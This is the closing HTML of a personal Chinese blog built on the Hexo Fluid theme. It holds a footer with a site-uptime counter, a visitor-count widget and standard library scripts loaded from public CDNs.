          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202202110012686.png" srcset="/img/loading.gif" lazyload class="rounded mx-auto d-block mt-5" style="width:120px; height:120px;">
  <br>
  <center> # 曾记否，到中流击水，浪遏飞舟？ </center>
<footer class="text-center mt-5 py-3">

  
  <div class="footer-content">
    <div>
      <span id="timeDate">载入天数...</span>
      <span id="times">载入时分秒...</span>
      <script>
      var now = new Date();
      function createtime(){
          var grt= new Date("01/07/2022 00:00:00");//此处修改你的建站时间或者网站上线时间
          now.setTime(now.getTime()+250);
          days = (now - grt ) / 1000 / 60 / 60 / 24;
          dnum = Math.floor(days);
          hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
          hnum = Math.floor(hours);
          if(String(hnum).length ==1 ){
              hnum = "0" + hnum;
          }
          minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
          mnum = Math.floor(minutes);
          if(String(mnum).length ==1 ){
                    mnum = "0" + mnum;
          }
          seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
          snum = Math.round(seconds);
          if(String(snum).length ==1 ){
                    snum = "0" + snum;
          }
          
          document.getElementById("timeDate").innerHTML = "🚀 &nbsp;"+dnum+"&nbsp天";  //此次自定义显示内容
          document.getElementById("times").innerHTML = hnum + "&nbsp小时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
      }  //此次自定义显示内容
      setInterval("createtime()",250);
      </script>
    </div>
  </div>

  
  
    <!-- 不蒜子统计 -->
    
      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span >本站总访问量：
            <span id="busuanzi_value_site_pv"></span>次</span>
    
    
    
    
    
    
  <div>©2022<a href="https://d3n13d.github.io/">&nbsp;&nbsp;D3n13d 的快乐小屋</a></div>

  
</footer>




  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":true,"trickleSpeed":80})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>














  
<script src="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
